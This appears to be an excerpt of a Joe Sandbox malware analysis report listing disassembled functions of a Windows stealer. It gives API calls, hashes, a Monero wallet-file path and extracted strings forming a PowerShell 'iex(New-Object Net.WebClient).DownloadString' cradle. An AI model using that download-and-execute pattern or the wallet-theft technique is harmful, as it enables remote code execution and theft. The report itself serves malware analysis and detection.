                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 531068710-2746444292
                                      • Opcode ID: 0d5b1d6172961d9fa21b979fcef00a3599c6ba3d64392ac77e85af413a08a924
                                      • Instruction ID: 5eb2a73943d88d1e046fe1ed76d4edb239162dc04fe1752bab47d0196a7709f8
                                      • Opcode Fuzzy Hash: 0d5b1d6172961d9fa21b979fcef00a3599c6ba3d64392ac77e85af413a08a924
                                      • Instruction Fuzzy Hash: B75177B19443189BEB24DB64DC4AFDE7778AF44700F044598B60DAB2C1EB75AB84CF61
                                      Function 00DAF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00DAFA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00DAFA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00DAFAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00DAFADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00DAFB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: c03fd015d8c5632e877231817fdcdc6568a6508647902982549606bd1d381d8f
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: 7F419531900119EBCF10DFA8C884ADEBBB5FF46314F1885A5E919AB351D731D905CBB1
                                      Function 00D35000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D35021
                                      • InternetOpenA.WININET(00D50DE3,00000000,00000000,00000000,00000000), ref: 00D3503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D35061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D35091
                                      • InternetCloseHandle.WININET(?), ref: 00D35109
                                      • InternetCloseHandle.WININET(?), ref: 00D35116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 6e7112a1090e53170db1269f3aacd3d3bbcd20091f7739e3756fe5f3f810020b
                                      • Instruction ID: 5e2490adbee031b1ba324f69549aca83cc08144a53b2712b133f9031dc86076c
                                      • Opcode Fuzzy Hash: 6e7112a1090e53170db1269f3aacd3d3bbcd20091f7739e3756fe5f3f810020b
                                      • Instruction Fuzzy Hash: 533117B4A40218ABDB24CF54DC85BDDB7B5EB48304F1081D8FB49A7284D7756EC58FA8
                                      Function 00D4856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D485B6
                                      • wsprintfA.USER32 ref: 00D485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D48629
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,0167E578,00000000,000F003F,?,00000400), ref: 00D4867C
                                      • lstrlen.KERNEL32(?), ref: 00D48691
                                      • RegQueryValueExA.ADVAPI32(00000000,0167E4E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00D50B3C), ref: 00D48729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D48798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D487AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 2e479fe2f2fafe260cc77294f3cb56e648e45ecebb41e07a5a40453b9fcd5a1b
                                      • Instruction ID: 416b2ef485ca1511785416f9f9ba663839c3ca512e12a75f4d77d97638dc8c02
                                      • Opcode Fuzzy Hash: 2e479fe2f2fafe260cc77294f3cb56e648e45ecebb41e07a5a40453b9fcd5a1b
                                      • Instruction Fuzzy Hash: EF21E671A10218ABDB24DB54DC85FE9B3B9FB48704F1081D8E649A6180DF75AA85CFE4
                                      Function 00D499A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D499C5
                                      • Process32First.KERNEL32(00D3A056,00000128), ref: 00D499D9
                                      • Process32Next.KERNEL32(00D3A056,00000128), ref: 00D499F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D49A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D49A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00D49A79
                                      • CloseHandle.KERNEL32(00D3A056), ref: 00D49A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 5f6637b11a527216ed5212d75c8253464166b7133528a20a8f611c3bda072caf
                                      • Instruction ID: 4acc0c2ce93d1bbcd72627d2e7f566b7585a7c8fe33cecaee04de14706696d45
                                      • Opcode Fuzzy Hash: 5f6637b11a527216ed5212d75c8253464166b7133528a20a8f611c3bda072caf
                                      • Instruction Fuzzy Hash: B2212C70900218EBDF31DFA6C899BDEB7B5BB48304F0441C8E549A6284C779AF84CFA0
                                      Function 00D47820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D4783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0166C208,00000000,00020119,00000000), ref: 00D4786D
                                      • RegQueryValueExA.ADVAPI32(00000000,0167E518,00000000,00000000,?,000000FF), ref: 00D4788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D47898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: d202537bc76400badeae5eae95c7bb2f575af51005a219f10c7a579806f0c1ed
                                      • Instruction ID: c387b4ca9a8ce0a84b5f67fb5ca8be365b8c7aa09f9e41a3d6ef2a4e4fb20089
                                      • Opcode Fuzzy Hash: d202537bc76400badeae5eae95c7bb2f575af51005a219f10c7a579806f0c1ed
                                      • Instruction Fuzzy Hash: 41016275A04304BBEB10DBE4DD49FAE7779EB48700F004094FA85A7284D779AA00CB70
                                      Function 00D478B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D478C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D478CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0166C208,00000000,00020119,00D47849), ref: 00D478EB
                                      • RegQueryValueExA.ADVAPI32(00D47849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D4790A
                                      • RegCloseKey.ADVAPI32(00D47849), ref: 00D47914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: ca98b445e7d9697b1cf6744dcf5129bb88ad77f8ca8d7b41d5944e0a4cc02dfe
                                      • Instruction ID: c29fa34420f42d670389d9cab5e2108e0b204d3e24b84a6580f0538b9f954b17
                                      • Opcode Fuzzy Hash: ca98b445e7d9697b1cf6744dcf5129bb88ad77f8ca8d7b41d5944e0a4cc02dfe
                                      • Instruction Fuzzy Hash: 660167B5A40309BFEB10DBE4DC4AFAE7778EB08700F004594FA45A7284D7796A00CBA0
                                      Function 00D3A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                      • LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: c42ded494b43c4061459d135924f0142010a350c4eb0bd21115d97c8fad40528
                                      • Instruction ID: d31e8b24c9ee1a2ebcdb009c4fb3364a63e5774464d3792314d84f6c28780a1b
                                      • Opcode Fuzzy Hash: c42ded494b43c4061459d135924f0142010a350c4eb0bd21115d97c8fad40528
                                      • Instruction Fuzzy Hash: 9631DC74A00209EFDB14CF94D845FEE77B5EB48304F148158E951A7284D779AA81CFA1
                                      Function 00D449D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,0167E0E0), ref: 00D44A2B
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D44A51
                                      • lstrcat.KERNEL32(?,?), ref: 00D44A70
                                      • lstrcat.KERNEL32(?,?), ref: 00D44A84
                                      • lstrcat.KERNEL32(?,0166B7C0), ref: 00D44A97
                                      • lstrcat.KERNEL32(?,?), ref: 00D44AAB
                                      • lstrcat.KERNEL32(?,0167D800), ref: 00D44ABF
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D48F20: GetFileAttributesA.KERNEL32(00000000,?,00D31B94,?,?,00D5577C,?,?,00D50E22), ref: 00D48F2F
                                        • Part of subcall function 00D447C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D447D0
                                        • Part of subcall function 00D447C0: RtlAllocateHeap.NTDLL(00000000), ref: 00D447D7
                                        • Part of subcall function 00D447C0: wsprintfA.USER32 ref: 00D447F6
                                        • Part of subcall function 00D447C0: FindFirstFileA.KERNEL32(?,?), ref: 00D4480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 403dae6bbc1ee8160b734dc98633eddec37ba7db719b7bbbbd5b41cf5324a58f
                                      • Instruction ID: 59c701a6d1a8473ade96aaf38616eebb60a695e400f7176e97b96b0c8aee92ed
                                      • Opcode Fuzzy Hash: 403dae6bbc1ee8160b734dc98633eddec37ba7db719b7bbbbd5b41cf5324a58f
                                      • Instruction Fuzzy Hash: 813152B69002186BDB25FBB0DC9AEED733CEB48700F404589B65596045EE79A7C8CFB4
                                      Function 00D42EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D42FD5
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D42F54
                                      • <, xrefs: 00D42F89
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D42F14
                                      • ')", xrefs: 00D42F03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
